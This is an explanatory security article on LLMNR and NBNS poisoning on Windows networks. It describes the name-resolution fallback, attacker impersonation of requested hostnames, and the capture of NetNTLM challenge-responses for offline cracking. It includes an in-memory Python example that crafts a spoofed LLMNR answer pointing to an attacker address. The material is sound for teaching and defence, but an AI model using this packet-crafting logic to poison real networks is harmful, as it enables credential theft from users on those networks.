What is LLMNR and NBNS Poisoning?
When the LLMNR protocol was introduced with Microsoft Windows Vista, attackers quickly found ways to abuse how it behaves on a local network. The protocol exists to let IPv4 and IPv6 hosts resolve names to IP addresses when the DNS server cannot, and because any host on the link is allowed to answer, that fallback behaviour is exactly what gets manipulated.
Essentially, when a system with LLMNR and NBNS enabled tries to resolve a name to an IP address, it works through the following steps:
- The system checks its local hosts file for a static name-to-IP address mapping.
- If the hosts file has no entry, the system asks its configured DNS server(s) to resolve the name.
- If the DNS server(s) have no record for the name (or do not answer), the system sends an LLMNR query (multicast to 224.0.0.252 / ff02::1:3, UDP 5355) and an NBNS query (broadcast, UDP 137) asking other hosts on the local network for the answer.
An attacker exploits this by listening on the local network and waiting for these queries to arrive. When one does, the attacker answers it and impersonates the name being looked up. For example, if System A tries to resolve goog.com (a mistyped hostname, say), the attacker responds to the query with "I am goog.com". Whatever System A then does with that name, whether it authenticates over SMB, HTTP, FTP or similar, is sent to the attacker, because System A assumes it is talking to the legitimate system. Nothing in the reply authenticates the responder, so the victim has no way to tell a spoofed answer from a genuine one.
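To make the exchange concrete, here is an added example, not code from the original article or from any particular tool, that builds the victim's LLMNR query, parses it the way a poisoner would, crafts the spoofed answer, and decodes it the way the victim's resolver would. It runs entirely in memory; the hostname `fileserv01`, the attacker address `10.0.0.66` and the NBNS name `FILESRV` are assumptions chosen for the example, and a small helper shows the NBNS first-level name encoding a poisoner has to match when answering NBNS instead of LLMNR.

```python
"""Added example: what an LLMNR poisoning exchange looks like on the wire.

LLMNR (RFC 4795) reuses the DNS message format over UDP 5355 to the
multicast group 224.0.0.252 (IPv6 ff02::1:3). Nothing here touches the
network: the victim's query is constructed in memory, the "attacker"
parses it and builds a spoofed answer, and a victim-side parser shows
what the victim would then believe. Names and addresses are assumptions.
"""
import ipaddress
import struct

LLMNR_PORT = 5355
LLMNR_GROUP = "224.0.0.252"
TYPE_A, CLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS label encoding: length-prefixed labels, terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode()
        if not 0 < len(raw) < 64:
            raise ValueError("bad label length")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(buf: bytes, off: int):
    """Decode a label sequence starting at off; returns (name, next_offset)."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            break
        if n & 0xC0:
            raise ValueError("compression pointers are not handled in this example")
        labels.append(buf[off:off + n].decode())
        off += n
    return ".".join(labels), off


def build_query(txid: int, name: str) -> bytes:
    """What the victim multicasts after DNS failed: header + one A question."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def parse_query(pkt: bytes):
    """Attacker side: pull out the transaction ID and the name being asked for."""
    txid, flags, qd, _an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000 or qd != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return txid, name, qtype, qclass


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """Attacker side: answer any A question with the attacker's own address.

    The reply echoes the transaction ID and the question, sets QR=1 and
    appends one A record. A real poisoner sends this unicast back to the
    source address and port of the query it just saw.
    """
    txid, name, qtype, qclass = parse_query(query)
    if qtype != TYPE_A:
        raise ValueError("only A questions are poisoned in this example")
    question = encode_name(name) + struct.pack("!HH", qtype, qclass)
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    rdata = ipaddress.IPv4Address(attacker_ip).packed
    answer = encode_name(name) + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(pkt: bytes):
    """Victim side: what the stub resolver takes away from the reply."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & 0x8000 or an < 1:
        raise ValueError("not an LLMNR response")
    _, off = decode_name(pkt, 12)
    off += 4  # skip QTYPE/QCLASS of the echoed question
    name, off = decode_name(pkt, off)
    _rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    addr = str(ipaddress.IPv4Address(pkt[off:off + rdlen]))
    return txid, name, addr, ttl


def nbns_encode_name(name: str, suffix: int = 0x20) -> str:
    """NBNS first-level encoding: 15-char space-padded name plus a service
    suffix byte (0x20 = file server, 0x00 = workstation), each nibble
    mapped onto 'A'..'P'. This is the 32-character form seen in NBNS packets.
    """
    raw = name.upper().ljust(15)[:15].encode() + bytes([suffix])
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0xF)) for b in raw)


def demo():
    # Constructed scenario: the victim mistyped a file server name that DNS
    # could not resolve, so it falls back to LLMNR; 10.0.0.66 is the assumed
    # attacker address.
    victim_query = build_query(0x1234, "fileserv01")
    spoofed = build_poisoned_response(victim_query, "10.0.0.66")
    return parse_response(spoofed)


if __name__ == "__main__":
    print(demo())
```

Running it prints the tuple the victim's resolver ends up with: transaction ID 0x1234, name fileserv01, address 10.0.0.66, TTL 30. The point to notice is that the only link between query and answer is a 16-bit transaction ID that the attacker simply copied from the multicast it observed; there is no signature, no server identity and no reason for the victim to prefer a genuine reply over the attacker's, which usually arrives first anyway.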
In most environments, what the attacker captures this way is a hashed form of the user's credentials: specifically, the NTLM challenge-response (NetNTLMv1 or NetNTLMv2) that the victim's client sends when it tries to authenticate to the attacker's machine. In some cases clear-text credentials can be observed as well, for example when the victim authenticates with a protocol that sends the password in the clear, such as HTTP basic authentication or FTP. Once the attacker holds the challenge-response, they can run offline brute-force and dictionary attacks against it to recover the clear-text password. Note that a NetNTLM response is not the user's NT hash itself and cannot be used directly for pass-the-hash; its value to the attacker is that the challenge was chosen by the attacker and the work happens entirely offline, so the only things limiting them are password strength and their hardware.